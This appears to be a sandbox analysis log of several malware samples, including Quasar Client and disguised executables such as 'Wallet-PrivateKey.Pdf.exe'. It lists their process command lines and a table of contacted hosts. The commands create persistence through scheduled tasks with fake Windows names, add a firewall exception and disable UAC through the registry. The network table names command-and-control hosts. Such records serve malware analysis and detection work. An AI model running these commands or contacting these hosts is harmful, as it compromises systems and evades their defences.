netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe

"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe

"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-380592931794380694-599577954-1813269182775463150-1857120456-12712435401267113664"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe

"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1075484357-329037004-210092016729264460814665411141886277669-3823256481606935560"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 1164

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe

"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1172

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1460

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\Servers.exe

"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "5483645295594997681410652334-1960867418-73037143113541422541004129646-983109749"

C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe

"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe

"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\mac.exe

"C:\Users\Admin\AppData\Local\Temp\a\mac.exe"

C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe

"C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\GoogleDat\GoogleUpdate.exe"

C:\ProgramData\GoogleDat\GoogleUpdate.exe

C:\ProgramData\GoogleDat\GoogleUpdate.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "146272486713716370342146452761-283201182191764725351370645312104548451266761744"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1436

C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client-base.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1623540158-857654453-1397294642-1169686346-53308944714274225182089971389-345946265"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat" "

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
US 151.101.194.49:443 urlhaus.abuse.ch tcp
DE 5.252.155.72:80 5.252.155.72 tcp
DE 185.208.159.240:8080 185.208.159.240 tcp
DE 185.208.159.240:8080 185.208.159.240 tcp
US 8.8.8.8:53 maerchen-beat-frei.ch udp
US 45.42.212.91:443 maerchen-beat-frei.ch tcp
CH 95.183.50.117:80 95.183.50.117 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
TR 45.138.183.226:80 45.138.183.226 tcp
US 8.8.8.8:53 plunder.dedyn.io udp
US 8.8.8.8:53 OMTkTMNzXANwD.OMTkTMNzXANwD udp
TR 216.9.224.66:5000 plunder.dedyn.io tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
HK 121.127.231.166:80 121.127.231.166 tcp
NL 149.154.167.99:443 t.me tcp
GB 20.26.156.215:80 github.com tcp
NL 149.154.167.99:443 t.me tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
CN 124.221.100.215:80 tcp
CY 213.133.94.133:4444 tcp
US 8.8.8.8:53 else-directors.gl.at.ply.gg udp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
FI 95.217.240.67:443 95.217.240.67 tcp
DE 185.208.159.240:56001 tcp
FI 95.217.240.67:443 95.217.240.67 tcp
FI 95.217.240.67:443 95.217.240.67 tcp
DE 147.45.44.131:80 147.45.44.131 tcp
TR 45.138.183.226:80 45.138.183.226 tcp
TR 45.138.183.226:80 45.138.183.226 tcp
US 8.8.8.8:53 dash.3utilities.com udp
US 8.8.8.8:53 dash1.3utilities.com udp
US 8.8.8.8:53 dash2.ddns.net udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 bash.mywire.org udp
US 192.188.88.248:2404 bash.mywire.org tcp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 bash1.accesscam.org udp
US 192.188.88.248:2404 bash1.accesscam.org tcp
US 8.8.8.8:53 tuna91.duckdns.org udp
US 8.8.8.8:53 dash3.ddns.net udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 dash4.ddns.net udp
JP 8.209.212.26:7777 8.209.212.26 tcp
US 8.8.8.8:53 wexos47815-61484.portmap.host udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FI 95.217.240.67:443 95.217.240.67 tcp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
FI 95.217.240.67:443 95.217.240.67 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 mail.mindfulinvoice.online udp
US 199.127.63.127:8041 mail.mindfulinvoice.online tcp
FI 95.217.240.67:443 95.217.240.67 tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
CN 120.26.164.174:8088 tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 172.86.108.55:7771 tcp
DE 147.45.44.131:80 147.45.44.131 tcp
GB 20.26.156.215:80 github.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 207.231.111.48:80 207.231.111.48 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 8.8.8.8:53 mim.no-ip.net udp
RU 185.215.113.16:80 tcp
US 8.8.8.8:53 adidya354-21806.portmap.host udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
HK 45.192.96.63:6001 45.192.96.63 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 147.45.44.131:80 147.45.44.131 tcp
FR 163.172.125.253:333 tcp
RU 185.215.113.16:80 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 bash2.accesscam.org udp
US 192.188.88.248:2404 bash2.accesscam.org tcp
RU 185.215.113.16:80 tcp
FR 163.172.125.253:333 tcp
US 104.20.3.235:443 pastebin.com tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
FR 163.172.125.253:333 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 tuna91.duckdns.org udp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 docs.google.com udp
GB 216.58.212.206:443 docs.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.204.65:443 drive.usercontent.google.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
DE 3.74.27.83:16872 0.tcp.eu.ngrok.io tcp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
FR 163.172.125.253:333 tcp
US 104.20.3.235:443 pastebin.com tcp
US 72.167.39.236:443 tcp
US 8.8.8.8:53 tualcaldia.com udp
US 72.167.39.236:443 tualcaldia.com tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
RU 185.81.68.147:80 tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 90.113.178.145:9033 tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
FR 163.172.125.253:333 tcp
US 72.167.39.236:443 tualcaldia.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 72.167.39.236:443 tualcaldia.com tcp
RU 185.81.68.147:80 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
N/A 127.0.0.1:53896 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
FR 163.172.125.253:333 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 104.20.3.235:443 pastebin.com tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 104.20.3.235:443 pastebin.com tcp
N/A 127.0.0.1:53896 tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 104.20.3.235:443 pastebin.com tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
N/A 127.0.0.1:53896 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
FR 90.113.178.145:9033 tcp
US 104.20.3.235:443 pastebin.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
FR 163.172.125.253:333 tcp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
US 104.20.3.235:443 pastebin.com tcp
RU 176.113.115.215:80 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
GB 20.26.156.215:443 github.com tcp
N/A 192.168.50.1:4782 tcp
US 104.20.3.235:443 pastebin.com tcp
FR 163.172.125.253:333 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
N/A 127.0.0.1:53896 tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
FR 90.113.178.145:9033 tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 8.8.8.8:53 cdn.glitch.me udp
IE 18.66.171.56:80 cdn.glitch.me tcp
N/A 127.0.0.1:53896 tcp
GB 20.26.156.215:443 github.com tcp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
US 104.20.3.235:443 pastebin.com tcp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 8.8.4.4:53 mim.no-ip.net udp
US 104.20.3.235:443 pastebin.com tcp
TR 176.232.184.98:1604 tuna91.duckdns.org tcp
N/A 127.0.0.1:53896 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gamwtonxristo.ddns.net udp
US 104.20.3.235:443 pastebin.com tcp
CA 198.50.242.157:80 198.50.242.157 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
N/A 10.0.0.113:4782 tcp
DE 193.161.193.99:20466 tcp
DE 52.57.120.10:16872 0.tcp.eu.ngrok.io tcp
FR 163.172.125.253:333 tcp
DE 77.105.161.58:80 77.105.161.58 tcp
GB 89.197.154.116:80 89.197.154.116 tcp
GB 89.197.154.116:7810 tcp
CA 198.50.242.157:443 tcp
RU 185.215.113.16:80 tcp
US 8.8.8.8:53 sulfux.ddns.net udp
FR 90.113.179.93:9033 sulfux.ddns.net tcp
US 192.188.88.248:2404 bash2.accesscam.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 apleegodfivem.ddns.net udp
RU 185.215.113.16:80 tcp
US 8.8.8.8:53 0.tcp.eu.ngrok.io udp
DE 18.153.198.123:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
CA 198.50.242.157:443 tcp
FR 163.172.125.253:333 tcp
IN 13.202.226.61:14296 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 2.tcp.eu.ngrok.io udp
US 104.20.3.235:443 pastebin.com tcp
US 147.185.221.23:56448 else-directors.gl.at.ply.gg tcp
DE 18.153.198.123:16872 0.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 mim.no-ip.net udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.4.4:53 mim.no-ip.net udp

Files

